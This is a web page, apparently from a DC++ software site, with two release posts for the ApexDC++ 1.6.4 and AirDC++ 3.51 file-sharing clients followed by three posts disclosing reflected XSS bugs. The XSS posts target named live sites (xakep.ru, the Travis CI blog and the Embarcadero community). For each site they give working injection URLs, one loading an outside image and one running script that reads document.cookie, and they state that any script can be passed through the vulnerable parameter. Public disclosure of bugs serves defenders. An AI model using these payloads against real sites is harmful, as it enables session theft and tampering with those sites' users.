This site uses cookies. In order to read how we handle cookies please click here. Click on this message to accept and hide.
Go to top
18.97.14.81.US.SSL

ApexDC++ ApexDC++ 1.6.4

These official ApexDC++ 1.6.4 x86 + x64 installers were put into ZIP archive due to unavailability of sharing pure executable files on our website.

Changes in 1.6.4
Fix: Connectivity issues related to new versions of zlib (DC++)
Change: Updated zlib to version 1.2.11
Change: OpenSSL upgrade to 1.0.2k

File information: ApexDC++ 1.6.4
Posted by apexdc on 2018-10-29 21:40 0 comments 1 like

AirDC++ AirDC++ 3.51

This official AirDC++ 3.51 installer was put into ZIP archive due to unavailability of sharing pure executable files on our website.

Changes in 3.51
Fixed:

Fix a crash when receiving invalid ADC search results
Fix handling of (invalid) files that were modified more than 48 years ago
Retain listview focus when using back and up buttons in browserbar
Update OpenSSL (fixes encryption issues on certain CPU architectures)

File information: AirDC++ 3.51
Posted by airdc on 2018-10-29 21:21 0 comments 1 like

Xakep.ru XSS bug

Vulnerable page: https://xakep.ru/

PoC
https://xakep.ru/soon/?lang="><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>

PoC
https://xakep.ru/soon/?lang="><script>alert(document.cookie)</script>

You can request any XSS code directly using GET method and lang parameter.

PoC
PoC


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by RoLex on 2018-03-09 22:40 0 comments 4 likes

Travis CI blog XSS bug

Vulnerable page: https://blog.travis-ci.com/

PoC
https://blog.travis-ci.com/search?q="><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>

PoC
https://blog.travis-ci.com/search?q="><script>alert(document.cookie)</script>

You can either include any XSS code in search input box, or request any XSS code directly using GET method and q parameter.

PoC
PoC


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by RoLex on 2018-02-24 22:54 0 comments 4 likes

Embarcadero community XSS bug

Vulnerable page: https://community.embarcadero.com/

PoC
https://community.embarcadero.com/blogs/blog-menu?search="><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>

PoC
https://community.embarcadero.com/blogs/blog-menu?search="><script>alert(document.cookie)</script>

You can either include any XSS code in search input box, or request any XSS code directly using GET method and search parameter.

PoC
PoC


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by RoLex on 2018-02-24 13:47 0 comments 4 likes